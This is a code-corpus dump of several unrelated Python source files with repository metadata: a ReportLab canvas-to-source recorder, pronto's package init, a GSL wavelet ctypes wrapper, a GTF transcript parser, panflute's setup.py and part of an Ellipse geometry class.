will print the python source code equivalent to n1.py
Why would you want to use such a beast ?
- To linearize (serialize?) a program : optimizing some complex
parts for example.
- To debug : reading the generated Python source code may help you or
the ReportLab team to diagnose problems. The generated code is now
clearly commented and shows nesting levels, page numbers, and so
on. You can use the generated script when asking for support : we
can see the results you obtain without needing your data or complete
application.
- To create standalone scripts : say your program uses a high level
environment to generate its output (databases, RML, etc...), using
this class would give you an equivalent program but with complete
independence from the high level environment (e.g. if you don't
have Oracle).
- To contribute some nice looking PDF documents to the ReportLab website
without having to send a complete application you don't want to
distribute.
- ... Insert your own ideas here ...
- For fun because you can do it !
"""
import cStringIO
from reportlab.pdfgen import canvas
from reportlab.pdfgen import pathobject
from reportlab.pdfgen import textobject
PyHeader = '''#! /usr/bin/env python
#
# This code was entirely generated by ReportLab (http://www.reportlab.com)
#
import sys
from reportlab.pdfgen import pathobject
from reportlab.pdfgen import textobject
from reportlab.lib.colors import Color
def doIt(file, regenerate=0) :
"""Generates a PDF document, save it into file.
file : either a filename or a file-like object.
regenerate : if set then this function returns the Python source
code which when run will produce the same result.
if unset then this function returns None, and is
much faster.
"""
if regenerate :
from reportlab.pdfgen.pycanvas import Canvas
else :
from reportlab.pdfgen.canvas import Canvas
'''
PyFooter = '''
# if we want the equivalent Python source code, then send it back
if regenerate :
return str(c)
if __name__ == "__main__" :
if len(sys.argv) != 2 :
# second argument must be the name of the PDF file to create
sys.stderr.write("%s needs one and only one argument\\n" % sys.argv[0])
sys.exit(-1)
else :
# we've got a filename, we can proceed.
print doIt(sys.argv[1], regenerate=1)
sys.exit(0)'''
def buildargs(*args, **kwargs) :
    """Render positional and keyword arguments as a source-code call list.

    Positional arguments appear as their repr(); keyword arguments as
    'name=repr(value)'; everything joined with ', '.
    """
    pieces = [repr(value) for value in args]
    for (keyword, value) in kwargs.items() :
        pieces.append("%s=%s" % (keyword, repr(value)))
    return ", ".join(pieces)
class PDFAction :
    """Base class to fake method calls or attributes on PDF objects (Canvas, PDFPathObject, PDFTextObject).

    Each instance proxies one named method/attribute of a real reportlab
    object: calling it emits the equivalent Python source line before
    delegating to the real implementation.
    """
    def __init__(self, parent, action) :
        """Saves a pointer to the parent object, and the method name."""
        self._parent = parent
        self._action = action
    def __getattr__(self, name) :
        """Probably a method call on an attribute, returns the real one."""
        return getattr(getattr(self._parent._object, self._action), name)
    def __call__(self, *args, **kwargs) :
        """The fake method is called, print it then call the real one."""
        # Only emit source for top-level calls; _in > 0 means we're
        # inside a call that has already been printed.
        if not self._parent._parent._in :
            self._precomment()
            self._parent._parent._PyWrite("    %s.%s(%s)" % (self._parent._name, self._action, apply(buildargs, args, kwargs)))
            self._postcomment()
        self._parent._parent._in = self._parent._parent._in + 1
        retcode = apply(getattr(self._parent._object, self._action), args, kwargs)
        self._parent._parent._in = self._parent._parent._in - 1
        return retcode
    def __hash__(self) :
        return hash(getattr(self._parent._object, self._action))
    def __coerce__(self, other) :
        """Needed."""
        # Delegate numeric coercion to the real attribute (Python 2 only).
        return coerce(getattr(self._parent._object, self._action), other)
    def _precomment(self) :
        """To be overriden."""
        pass
    def _postcomment(self) :
        """To be overriden."""
        pass
class PDFObject :
    """Base class for PDF objects like PDFPathObject and PDFTextObject.

    Defers construction of the real reportlab object until the proxy
    is first called, so the creating source line can be printed with
    the actual arguments.
    """
    # Class-level counter of objects created, used in emitted comments.
    _number = 0
    def __init__(self, parent) :
        """Saves a pointer to the parent Canvas."""
        self._parent = parent
        self._initdone = 0
    def __getattr__(self, name) :
        """The user's programs wants to call one of our methods or get an attribute, fake it."""
        return PDFAction(self, name)
    def __repr__(self) :
        """Returns the name used in the generated source code (e.g. 'p' or 't')."""
        return self._name
    def __call__(self, *args, **kwargs) :
        """Real object initialisation is made here, because now we've got the arguments."""
        if not self._initdone :
            self.__class__._number = self.__class__._number + 1
            # _postinit (defined by subclasses) builds the real object and
            # returns the Canvas factory-method name, e.g. "beginText".
            methodname = apply(self._postinit, args, kwargs)
            self._parent._PyWrite("\n    # create PDF%sObject number %i\n    %s = %s.%s(%s)" % (methodname[5:], self.__class__._number, self._name, self._parent._name, methodname, apply(buildargs, args, kwargs)))
            self._initdone = 1
        return self
class Canvas :
    """Our fake Canvas class, which will intercept each and every method or attribute access.

    Wraps a real reportlab canvas.Canvas; every intercepted call is
    both executed and appended as Python source to an in-memory file,
    so str(canvas) yields a runnable equivalent program.
    """
    class TextObject(PDFObject) :
        # Proxy for textobject.PDFTextObject; named 't' in emitted source.
        _name = "t"
        def _postinit(self, *args, **kwargs) :
            self._object = apply(textobject.PDFTextObject, (self._parent, ) + args, kwargs)
            return "beginText"
    class PathObject(PDFObject) :
        # Proxy for pathobject.PDFPathObject; named 'p' in emitted source.
        _name = "p"
        def _postinit(self, *args, **kwargs) :
            self._object = apply(pathobject.PDFPathObject, args, kwargs)
            return "beginPath"
    class Action(PDFAction) :
        """Class called for every Canvas method call."""
        def _precomment(self) :
            """Outputs comments before the method call."""
            if self._action == "showPage" :
                self._parent._PyWrite("\n    # Ends page %i" % self._parent._pagenumber)
            elif self._action == "saveState" :
                # Snapshot the canvas graphics state into the comment so
                # the generated source documents what is being saved.
                state = {}
                d = self._parent._object.__dict__
                for name in self._parent._object.STATE_ATTRIBUTES:
                    state[name] = d[name]
                self._parent._PyWrite("\n    # Saves context level %i %s" % (self._parent._contextlevel, state))
                self._parent._contextlevel = self._parent._contextlevel + 1
            elif self._action == "restoreState" :
                self._parent._contextlevel = self._parent._contextlevel - 1
                self._parent._PyWrite("\n    # Restores context level %i %s" % (self._parent._contextlevel, self._parent._object.state_stack[-1]))
            elif self._action == "beginForm" :
                self._parent._formnumber = self._parent._formnumber + 1
                self._parent._PyWrite("\n    # Begins form %i" % self._parent._formnumber)
            elif self._action == "endForm" :
                self._parent._PyWrite("\n    # Ends form %i" % self._parent._formnumber)
            elif self._action == "save" :
                self._parent._PyWrite("\n    # Saves the PDF document to disk")
        def _postcomment(self) :
            """Outputs comments after the method call."""
            if self._action == "showPage" :
                self._parent._pagenumber = self._parent._pagenumber + 1
                self._parent._PyWrite("\n    # Begins page %i" % self._parent._pagenumber)
            elif self._action in [ "endForm", "drawPath", "clipPath" ] :
                self._parent._PyWrite("")
    # Name of the canvas variable in the generated source code.
    _name = "c"
    def __init__(self, *args, **kwargs) :
        """Initialize and begins source code."""
        self._parent = self    # nice trick, isn't it ?
        self._in = 0
        self._contextlevel = 0
        self._pagenumber = 1
        self._formnumber = 0
        self._footerpresent = 0
        self._object = apply(canvas.Canvas, args, kwargs)
        self._pyfile = cStringIO.StringIO()
        self._PyWrite(PyHeader)
        # The generated doIt() takes the output file as its own first
        # argument, so drop any caller-supplied filename keyword.
        try :
            del kwargs["filename"]
        except KeyError :
            pass
        self._PyWrite("    # create the PDF document\n    %s = Canvas(file, %s)\n\n    # Begins page 1" % (self._name, apply(buildargs, args[1:], kwargs)))
    def __nonzero__(self) :
        """This is needed by platypus' tables."""
        return 1
    def __str__(self) :
        """Returns the equivalent Python source code."""
        # Emit the footer exactly once, no matter how often str() runs.
        if not self._footerpresent :
            self._PyWrite(PyFooter)
            self._footerpresent = 1
        return self._pyfile.getvalue()
    def __getattr__(self, name) :
        """Method or attribute access."""
        if name == "beginPath" :
            return self.PathObject(self)
        elif name == "beginText" :
            return self.TextObject(self)
        else :
            return self.Action(self, name)
    def _PyWrite(self, pycode) :
        """Outputs the source code with a trailing newline."""
        self._pyfile.write("%s\n" % pycode)
if __name__ == '__main__':
print 'For test scripts, look in reportlab/test'
| {
"repo_name": "alexissmirnov/donomo",
"path": "donomo_archive/lib/reportlab/pdfgen/pycanvas.py",
"copies": "2",
"size": "12041",
"license": "bsd-3-clause",
"hash": -2903274007770771500,
"line_mean": 37.9676375405,
"line_max": 212,
"alpha_frac": 0.6247819949,
"autogenerated": false,
"ratio": 3.980495867768595,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.006654322782746797,
"num_lines": 309
} |
"""A Python frontend to ontologies.
**pronto** is a Python agnostic library designed to work with ontologies. At
the moment, it can parse ontologies in the OBO, OBO Graphs or OWL in RDF/XML
format, on either the local host or from an network location, and export
ontologies to OBO or OBO Graphs (in JSON format).
Caution:
Only classes and modules reachable from the top-level package ``pronto``
are considered public and are guaranteed stable over `Semantic Versioning
<https://semver.org/>`_. Use submodules (other than `~pronto.warnings`)
at your own risk!
Note:
``pronto`` implements proper *type checking* for most of the methods and
properties exposed in the public classes. This reproduces the behaviour
of the Python standard library, to avoid common errors. This feature does
however increase overhead, but can be disabled by executing Python in
optimized mode (with the ``-O`` flag). *Parsing performances are not
affected.*
"""
from .definition import Definition
from .entity import Entity
from .metadata import Metadata, Subset
from .ontology import Ontology
from .pv import LiteralPropertyValue, PropertyValue, ResourcePropertyValue
from .relationship import Relationship, RelationshipData, RelationshipSet
from .synonym import Synonym, SynonymData, SynonymType
from .term import Term, TermData, TermSet
from .utils import warnings
from .xref import Xref
# Using `__name__` attribute instead of directly using the name as a string
# so the linter doesn't complain about unused imports in the top module
__all__ = [
    # modules
    "warnings",
    # classes
    Ontology.__name__,
    Entity.__name__,
    Term.__name__,
    TermData.__name__,
    TermSet.__name__,
    Metadata.__name__,
    Subset.__name__,
    Definition.__name__,
    Relationship.__name__,
    RelationshipData.__name__,
    RelationshipSet.__name__,
    Synonym.__name__,
    SynonymData.__name__,
    SynonymType.__name__,
    PropertyValue.__name__,
    LiteralPropertyValue.__name__,
    ResourcePropertyValue.__name__,
    Xref.__name__,
]
# Package metadata; `__version__` is also interpolated into the docstring below.
__author__ = "Martin Larralde <martin.larralde@embl.de>"
__license__ = "MIT"
__version__ = "2.4.2"
# Update the docstring with a link to the right version of the documentation
# instead of the latest.  (`__doc__` is None when Python runs with -OO.)
if __doc__ is not None:
    __doc__ += f"""See Also:
    Online documentation for this version of the library on
    `Read The Docs <https://pronto.readthedocs.io/en/v{__version__}/>`_
    """
| {
"repo_name": "althonos/pronto",
"path": "pronto/__init__.py",
"copies": "1",
"size": "2473",
"license": "mit",
"hash": -1720939510308966000,
"line_mean": 33.8309859155,
"line_max": 77,
"alpha_frac": 0.7060250708,
"autogenerated": false,
"ratio": 3.858034321372855,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 71
} |
#A Python/GSL Wavelet library
# Dale Roberts <dale.o.roberts@gmail.com>
import numpy as np
from ctypes import CDLL, POINTER as PTR, RTLD_GLOBAL, Structure, c_size_t, c_double, c_char_p, c_int
# load BLAS and GSL
from ctypes.util import find_library
# Load BLAS first so GSL's CBLAS symbols resolve; RTLD_GLOBAL exposes each
# library's symbols to the ones loaded after it.
# Bug fix: ctypes.util.find_library() takes the bare library name, without the
# "lib" prefix or extension -- find_library("libblas") fails to resolve on most
# systems (and matches the bare names already used for "gslcblas"/"gsl" below).
libblas = CDLL(find_library("blas"), RTLD_GLOBAL)
libgslcblas = CDLL(find_library("gslcblas"), RTLD_GLOBAL)
libgsl = CDLL(find_library("gsl"), RTLD_GLOBAL)
# Opaque handles mirroring the GSL C structs; their fields are never accessed
# from Python, so the ctypes Structures are deliberately left empty.
class gsl_wavelet_type(Structure):
    pass
class gsl_wavelet(Structure):
    pass
class gsl_wavelet_workspace(Structure):
    pass
# Pointer type used for the exported wavelet-family constants (e.g. haar).
p_gsl_wavelet_type = PTR(gsl_wavelet_type)
def _p_const(fname):
    """Return the exported ``gsl_wavelet_<fname>`` family constant from libgsl."""
    symbol = "gsl_wavelet_" + fname
    return p_gsl_wavelet_type.in_dll(libgsl, symbol)
def _types(fname, restype, argtypes):
    """Declare the C signature of ``gsl_wavelet_<fname>`` and return the function.

    :fname: suffix of the GSL symbol (e.g. ``"alloc"``)
    :restype: ctypes result type, or None for a void function
    :argtypes: list of ctypes argument types
    """
    # Use getattr() rather than calling the dunder __getattr__ directly.
    func = getattr(libgsl, "gsl_wavelet_" + fname)
    # `is not None` (identity), not `!= None`: a void function keeps the
    # ctypes default restype.
    if restype is not None:
        func.restype = restype
    func.argtypes = argtypes
    return func
# Declare result/argument types for every GSL wavelet entry point used below,
# so ctypes marshals pointers and size_t arguments correctly.
_types("alloc", PTR(gsl_wavelet), [p_gsl_wavelet_type, c_size_t])
_types("free", None, [PTR(gsl_wavelet)])
_types("name", c_char_p, [PTR(gsl_wavelet)])
_types("workspace_alloc", PTR(gsl_wavelet_workspace), [c_size_t])
_types("workspace_free", None, [PTR(gsl_wavelet_workspace)])
_types("transform_forward", c_int, [PTR(gsl_wavelet), PTR(c_double), c_size_t, c_size_t, PTR(gsl_wavelet_workspace)])
_types("transform_inverse", c_int, [PTR(gsl_wavelet), PTR(c_double), c_size_t, c_size_t, PTR(gsl_wavelet_workspace)])
def gsl_dwt(x, family="haar", k=2, stride=1):
    """Forward discrete wavelet transform of *x* via GSL; returns a new array."""
    # GSL transforms in place and expects doubles, so work on a fresh copy.
    signal = np.array(x, dtype=np.double)
    n = len(signal)
    # Allocate the GSL workspace and wavelet objects.
    workspace = libgsl.gsl_wavelet_workspace_alloc(n)
    wavelet = libgsl.gsl_wavelet_alloc(_p_const(family), k)
    # Run the forward transform on the copy's underlying buffer.
    libgsl.gsl_wavelet_transform_forward(
        wavelet, signal.ctypes.data_as(PTR(c_double)), stride, n, workspace)
    # Release the C-side objects before returning.
    libgsl.gsl_wavelet_free(wavelet)
    libgsl.gsl_wavelet_workspace_free(workspace)
    return signal
def gsl_idwt(x, family="haar", k=2, stride=1):
    """Inverse discrete wavelet transform of *x* via GSL; returns a new array."""
    # GSL transforms in place and expects doubles, so work on a fresh copy.
    signal = np.array(x, dtype=np.double)
    n = len(signal)
    # Allocate the GSL workspace and wavelet objects.
    workspace = libgsl.gsl_wavelet_workspace_alloc(n)
    wavelet = libgsl.gsl_wavelet_alloc(_p_const(family), k)
    # Run the inverse transform on the copy's underlying buffer.
    libgsl.gsl_wavelet_transform_inverse(
        wavelet, signal.ctypes.data_as(PTR(c_double)), stride, n, workspace)
    # Release the C-side objects before returning.
    libgsl.gsl_wavelet_free(wavelet)
    libgsl.gsl_wavelet_workspace_free(workspace)
    return signal
# Smoke test: forward Haar DWT of a unit impulse.  Uses Python 2 print
# statements, so this guard only runs under a Python 2 interpreter.
if __name__ == '__main__':
    x = np.array([0.]*16)
    x[0]=1.
    print x
    print '-'*8
    print gsl_dwt(x)
| {
"repo_name": "daleroberts/py-dwt",
"path": "dwt.py",
"copies": "1",
"size": "2610",
"license": "bsd-3-clause",
"hash": 6594009633114817000,
"line_mean": 32.0379746835,
"line_max": 117,
"alpha_frac": 0.6647509579,
"autogenerated": false,
"ratio": 2.668711656441718,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3833462614341718,
"avg_score": null,
"num_lines": null
} |
# Riyaz Faizullabhoy
# 7/9/2012
# GTF --> GTF Objects
import argparse
import bisect
import copy
import sys
import warnings
from bisect import *
def run():
    """Parse command-line arguments and run the GTF parser.

    Usage: python gtf_parser.py <gtf-input-file-name>
    The GTF file must be in the current directory.
    Returns the transcript dictionary produced by gtf_parse().
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('gi',
                        metavar='gtf_input',
                        help="The GTF annotation input file name")
    try:
        args = parser.parse_args()
    except ValueError:
        # Bug fix: the original wrote `except ValueError as IOError`, which
        # shadowed the builtin IOError.  NOTE(review): argparse raises
        # SystemExit (not ValueError) on bad input, so this handler is
        # unlikely to fire -- and `args` would be unbound below if it did.
        sys.stderr.write("Parsing Error, please use the following "
                         "command-line format:\n"
                         "python gtf_parser.py <GTF_FILE_NAME>\n")
    return gtf_parse(args.gi)
class Transcript(object):
    """A single transcript (one transcript_id) parsed from a GTF file.

    Stores the transcript's identifying fields plus its exons as a sorted
    list of 0-based, right-exclusive ``(start, stop)`` tuples.
    """

    def __init__(
            self,
            transcript_id,
            refname,
            strand,
            frame,
            gene_id_attributes,
            gene_id,
            score=None,
            source=None):
        self.transcript_id = transcript_id
        self.refname = refname
        self.strand = strand
        # Anything other than '+' (including '.' or missing) is treated as
        # the reverse strand.
        if strand == "+":
            self._is_reverse = False
        else:
            self._is_reverse = True
        self.frame = frame
        self.gene_id_attributes = gene_id_attributes
        self.gene_id = gene_id
        self.exons = []
        # Right-most coordinate seen so far; None until the first exon is added.
        self._furthest_added_exon = None
        # GTF uses '.' for "no score"; normalize it to None.
        if score == '.':
            self.score = None
        else:
            self.score = score
        self.source = source

    def add_exon(self, exon):
        """Add a ``(start, stop)`` exon tuple to the transcript.

        Raises an Exception for a malformed, abutting, or overlapping exon;
        callers treat a raising transcript as bad and drop it from the output.
        """
        if exon[0] > exon[1]:
            raise Exception(
                "Invalid exon start/stop in transcript: " +
                str(self.transcript_id))
        if exon[0] == self._furthest_added_exon:
            raise Exception('Non-sensical exons. ' +
                            'One begins right after the other ends.' +
                            ' This should all be one exon: {0}'.format(self))
        # Fast path: exon arrives in order, append at the end.
        # Bug fix: check `is None` FIRST -- on the first exon there is nothing
        # to compare against, and `None < int` raises TypeError on Python 3
        # (the original short-circuited the other way round).
        if self._furthest_added_exon is None or \
                self._furthest_added_exon < exon[0]:
            self.exons += [exon]
            self._furthest_added_exon = exon[1]
            return
        for existing in self.exons:
            if (existing[1] >= exon[0]) and (exon[1] >= existing[0]):
                raise Exception(
                    "Overlapping exon in transcript: " +
                    str(self.transcript_id))
        # Out-of-order exon: insert while keeping the list sorted.
        index = bisect_left(self.exons, exon)
        self.exons.insert(index, exon)

    @property
    def front_coordinate(self):
        """Left-most coordinate of the left-most exon."""
        return self.exons[0][0]

    @property
    def end_coordinate(self):
        """Right-most coordinate of the last (right-most) exon."""
        return self.exons[-1][1]

    def compatible(self, pos):
        """Return the index of the exon containing *pos*, or None."""
        for idx, exon in enumerate(self.exons):
            if pos >= exon[0] and pos < exon[1]:
                return idx
        return None

    def to_gtf(self):
        """Render the transcript as newline-joined GTF 'exon' lines.

        Converts back to GTF's 1-based, inclusive coordinates.  Raises an
        Exception if no exons have been added.
        """
        if len(self.exons) == 0:
            raise Exception('Cannot print to GTF if no exons')
        trans_str = []
        trans_str.append(self.refname)
        trans_str.append(self.source if self.source is not None else 'NA')
        trans_str.append('exon')
        all_exons = []
        for ex in self.exons:
            exon_str = copy.deepcopy(trans_str)
            exon_str.append(str(ex[0] + 1))  # back to 1-based start
            exon_str.append(str(ex[1]))
            if self.score is None:
                exon_str.append('.')
            else:
                exon_str.append(self.score)
            exon_str.append('-' if self.is_reverse else '+')
            exon_str.append(str(self.frame))
            exon_str.append('gene_id "' + self.gene_id + '";' +
                            ' transcript_id "' + self.transcript_id + '";')
            # FIXME: after gene_id_attributes is parsed correctly, append it
            # here as well (preceded by a space).
            all_exons.append('\t'.join(exon_str))
        return '\n'.join(all_exons)

    @property
    def is_reverse(self):
        """True if the transcript is on the reverse strand."""
        return self._is_reverse

    def __repr__(self):
        return self.__str__()

    def __str__(self):
        return '{0}:{1}:{2}-{3}'.format(
            self.transcript_id,
            self.refname,
            self.front_coordinate,
            self.end_coordinate)
def gtf_parse(input_gtf):
    """Parse a GTF file into a dict mapping transcript_id -> Transcript.

    Uses pythonic 0-based, right-exclusive coordinates: a GTF exon with
    start 1, end 2 becomes the tuple (0, 2).  Transcripts whose exons are
    malformed are remembered in `bad_transcripts` and mapped to None.
    """
    transcript_dictionary = {}
    bad_transcripts = []
    current_transcript = None
    # `with` guarantees the handle is closed even if parsing raises.
    with open(input_gtf, 'r') as gtf_file:
        for line in gtf_file:
            if line.startswith('#'):
                continue
            gtf_line = line.split("\t")
            if len(gtf_line) < 9 or gtf_line[2] != "exon":
                continue
            try:
                transcript_id = (
                    gtf_line[8].split(";")[1].split(" ")[2].replace(
                        "\"",
                        ""))
                if transcript_id in bad_transcripts:
                    continue
            except IndexError:
                sys.stderr.write(
                    "GTF File Input missing 'transcript_id' field\n")
            if current_transcript is None:
                # First exon line seen: create the transcript.
                try:
                    # FIXME: gene_id_attributes isn't being parsed correctly
                    gene_id = gtf_line[8].split(";")[0].split(
                        " ")[1].replace("\"", "")
                    current_transcript = Transcript(
                        transcript_id,
                        gtf_line[0],
                        gtf_line[6],
                        gtf_line[7],
                        gtf_line[8].split(" ")[3],
                        gene_id,
                        gtf_line[5],
                        gtf_line[1])
                    transcript_dictionary[transcript_id] = current_transcript
                    transcript_dictionary[transcript_id].add_exon(
                        (int(gtf_line[3]) - 1, int(gtf_line[4])))
                except IndexError:
                    sys.stderr.write("GTF File Input missing fields\n")
                except Exception as e:
                    sys.stderr.write(str(e) + "\n")
                    # Bug fix: `bad_transcripts += <str>` appended the id's
                    # individual CHARACTERS; append the whole id instead.
                    bad_transcripts.append(transcript_id)
                    current_transcript = None  # throw out the bad transcript
                    transcript_dictionary[transcript_id] = None
            elif transcript_id != current_transcript.transcript_id:
                # Exon belongs to a previously-seen (or brand new) transcript.
                try:
                    transcript_dictionary[transcript_id].add_exon(
                        (int(gtf_line[3]) - 1,
                         int(gtf_line[4])))
                    current_transcript = transcript_dictionary[transcript_id]
                except KeyError:
                    gene_id = gtf_line[8].split(";")[0].split(
                        " ")[1].replace("\"", "")
                    # FIXME: gene_id_attributes isn't being parsed correctly
                    current_transcript = Transcript(
                        transcript_id,
                        gtf_line[0],
                        gtf_line[6],
                        gtf_line[7],
                        gtf_line[8].split(" ")[
                            4:],
                        gene_id,
                        gtf_line[5],
                        gtf_line[1])
                    transcript_dictionary[transcript_id] = current_transcript
                    transcript_dictionary[transcript_id].add_exon(
                        (int(gtf_line[3]) - 1,
                         int(gtf_line[4])))
                except IndexError:
                    sys.stderr.write("GTF File Input missing fields\n")
                except Exception as e:
                    sys.stderr.write(str(e) + "\n")
                    # Bug fix: append the FAILING transcript's id (the
                    # original appended characters of the previous one).
                    bad_transcripts.append(transcript_id)
                    current_transcript = None
                    transcript_dictionary[transcript_id] = None
            else:
                # Another exon of the transcript we are currently building.
                try:
                    current_transcript.add_exon(
                        (int(gtf_line[3]) - 1,
                         int(gtf_line[4])))
                except IndexError:
                    sys.stderr.write("GTF File Input missing fields\n")
                except Exception as e:
                    sys.stderr.write(str(e) + "\n")
                    bad_transcripts.append(transcript_id)
                    current_transcript = None
                    transcript_dictionary[transcript_id] = None
    return transcript_dictionary
def gtf_write(all_trans, out_handle):
    """Write a transcript dict to *out_handle* in GTF format.

    Transcripts are ordered by (refname, front_coordinate).  The leftover
    debug statement `print all_trans` (a Python 3 syntax error) has been
    removed, and the Python 2 `print >>` redirect replaced with a plain
    write so the function runs under both interpreters.
    """
    ordered = sorted(all_trans.values(),
                     key=lambda t: (t.refname, t.front_coordinate))
    for trans in ordered:
        out_handle.write(trans.to_gtf() + "\n")
# Entry point: parse the GTF file named on the command line.
if (__name__ == "__main__"):
    run()
| {
"repo_name": "riyazdf/gtf-parser",
"path": "lib/src/gtf_parser.py",
"copies": "1",
"size": "10645",
"license": "mit",
"hash": -813180131919394000,
"line_mean": 32.4748427673,
"line_max": 81,
"alpha_frac": 0.5458900892,
"autogenerated": false,
"ratio": 4.07230298393267,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.511819307313267,
"avg_score": null,
"num_lines": null
} |
"""A pythonic alternative to pandocfilters
See:
https://github.com/sergiocorreia/panflute
"""
from setuptools import setup, find_packages
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
    long_description = f.read()
# Import version number
# (executed in an isolated namespace so the package itself is never imported
# before its dependencies are installed)
version = {}
with open("panflute/version.py") as fp:
    exec(fp.read(), version)
version = version['__version__']
setup(
    name='panflute',
    # Versions should comply with PEP440. For a discussion on single-sourcing
    # the version across setup.py and the project code, see
    # https://packaging.python.org/en/latest/single_source_version.html
    version=version,
    description='Pythonic Pandoc filters',
    long_description=long_description,
    long_description_content_type='text/markdown',
    # The project's main homepage.
    url='https://github.com/sergiocorreia/panflute',
    project_urls={
        "Source": "https://github.com/sergiocorreia/panflute",
        "Documentation": "http://scorreia.com/software/panflute/",
        "Tracker": "https://github.com/sergiocorreia/panflute/issues",
    },
    # Author details
    author="Sergio Correia",
    author_email='sergio.correia@gmail.com',
    # Choose your license
    license='BSD3',
    # See https://pypi.python.org/pypi?%3Aaction=list_classifiers
    classifiers=[
        # How mature is this project? Common values are
        #   3 - Alpha
        #   4 - Beta
        #   5 - Production/Stable
        'Development Status :: 5 - Production/Stable',
        'Environment :: Console',
        # Indicate who your project is intended for
        'Intended Audience :: End Users/Desktop',
        'Intended Audience :: Developers',
        'Topic :: Software Development :: Build Tools',
        # Pick your license as you wish (should match "license" above)
        'License :: OSI Approved :: BSD License',
        'Operating System :: OS Independent',
        'Topic :: Text Processing :: Filters',
        # Specify the Python versions you support here. In particular, ensure
        # that you indicate whether you support Python 2, Python 3 or both.
        # https://pypi.python.org/pypi?%3Aaction=list_classifiers
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
        'Programming Language :: Python :: 3.9',
        'Programming Language :: Python :: Implementation :: CPython',
        'Programming Language :: Python :: Implementation :: PyPy'
    ],
    # What does your project relate to?
    keywords='pandoc pandocfilters markdown latex',
    # You can just specify the packages manually here if your project is
    # simple. Or you can use find_packages().
    packages=find_packages(exclude=['contrib', 'docs', 'tests', 'examples']),
    python_requires='>=3.6',
    # List run-time dependencies here. These will be installed by pip when
    # your project is installed. For an analysis of "install_requires" vs pip's
    # requirements files see:
    # https://packaging.python.org/en/latest/requirements.html
    install_requires=[
        'click >=6,<9',
        'pyyaml >=3,<6',
    ],
    # List additional groups of dependencies here (e.g. development
    # dependencies). You can install these using the following syntax,
    # for example:
    # $ pip install -e .[dev,pypi]
    extras_require={
        'dev': [
            'configparser',
            'coverage',
            'flake8',
            'pandocfilters',
            'pytest-cov',
            'pytest',
            'requests',
        ],
        'pypi': [
            'docutils',
            'Pygments',
            'twine',
            'wheel',
        ]
    },
    # If there are data files included in your packages that need to be
    # installed, specify them here. If using Python 2.6 or less, then these
    # have to be included in MANIFEST.in as well.
    #package_data={
    #    'sample': ['package_data.dat'],
    #},
    # Although 'package_data' is the preferred approach, in some case you may
    # need to place data files outside of your packages. See:
    # http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
    # In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
    #data_files=[('my_data', ['data/data_file'])],
    # To provide executable scripts, use entry points in preference to the
    # "scripts" keyword. Entry points provide cross-platform support and allow
    # pip to create the appropriate form of executable for the target platform.
    entry_points={
        'console_scripts': [
            'panflute=panflute:main',
            'panfl=panflute:panfl',
        ],
    },
)
| {
"repo_name": "sergiocorreia/panflute",
"path": "setup.py",
"copies": "1",
"size": "4836",
"license": "bsd-3-clause",
"hash": 3814324838442663000,
"line_mean": 33.0563380282,
"line_max": 94,
"alpha_frac": 0.6306865178,
"autogenerated": false,
"ratio": 4.003311258278146,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0013704777685722177,
"num_lines": 142
} |
'''a pythonic Ellipse.
Super awesome.
'''
import math
from . import Point
from .line import Line, Segment
class Ellipse(object):
    '''
    Implements an ellipse in the XY plane with the supplied radii.
    Returns a unit ellipse centered on the origin in the XY by default.
    Usage:
    >>> from Geometry import Ellipse
    >>> e = Ellipse()
    >>> e.isCircle
    True
    >>> type(e)
    <class 'Geometry.ellipse.Ellipse'>
    >>> e.radius.x *= 2
    >>> e.isCircle,e.isEllipse
    (False, True)
    '''
    def __init__(self, center=None, x_radius=1, y_radius=1, z_radius=0):
        '''
        :center: - optional Point class initializer
        :x_radius: - optional float
        :y_radius: - optional float
        :z_radius: - optional float
        Defaults to a unit ellipse centered on the origin.
        '''
        # XXX what does it mean to have non-zero radii in
        #     all three dimensions?
        self.center = center
        self.radius = x_radius, y_radius, z_radius
    @property
    def center(self):
        '''
        Center point of the ellipse, equidistant from foci, Point class.\n
        Defaults to the origin.
        '''
        # Lazily create the backing Point on first access.
        try:
            return self._center
        except AttributeError:
            pass
        self._center = Point()
        return self._center
    @center.setter
    def center(self, newValue):
        # Delegates input parsing (None, tuple, Point, ...) to Point.xyz;
        # presumably Point.xyz accepts the same initializers as Point() --
        # TODO confirm against the Point class.
        self.center.xyz = newValue
    @property
    def radius(self):
        '''
        Radius of the ellipse, Point class.
        '''
        # Lazily create the backing Point (unit radii in X and Y) on first
        # access.
        try:
            return self._radius
        except AttributeError:
            pass
        self._radius = Point(1, 1, 0)
        return self._radius
    @radius.setter
    def radius(self, newValue):
        self.radius.xyz = newValue
    def __str__(self):
        '''
        '''
        return 'center={p.center!r}, radius={p.radius!r}'.format(p=self)
    def __repr__(self):
        '''
        '''
        return '{p.__class__.__name__}({p!s})'.format(p=self)
    def __hash__(self):
        '''
        '''
        # NOTE(review): instances are mutable (center/radius setters), so
        # the hash can change after insertion into a set/dict -- confirm
        # intended usage.
        return hash(self.center) + hash(self.radius)
    @property
    def majorRadius(self):
        '''
        The longest radius of the ellipse, float.
        '''
        return max(self.radius.x, self.radius.y)
    @property
    def minorRadius(self):
        '''
        The shortest radius of the ellipse, float.
        '''
        return min(self.radius.x, self.radius.y)
    @property
    def xAxisIsMajor(self):
        '''
        Returns True if the major axis is parallel to the X axis, boolean.
        '''
        return max(self.radius.x, self.radius.y) == self.radius.x
    @property
    def xAxisIsMinor(self):
        '''
        Returns True if the minor axis is parallel to the X axis, boolean.
        '''
        return min(self.radius.x, self.radius.y) == self.radius.x
    @property
    def yAxisIsMajor(self):
        '''
        Returns True if the major axis is parallel to the Y axis, boolean.
        '''
        return max(self.radius.x, self.radius.y) == self.radius.y
    @property
    def yAxisIsMinor(self):
        '''
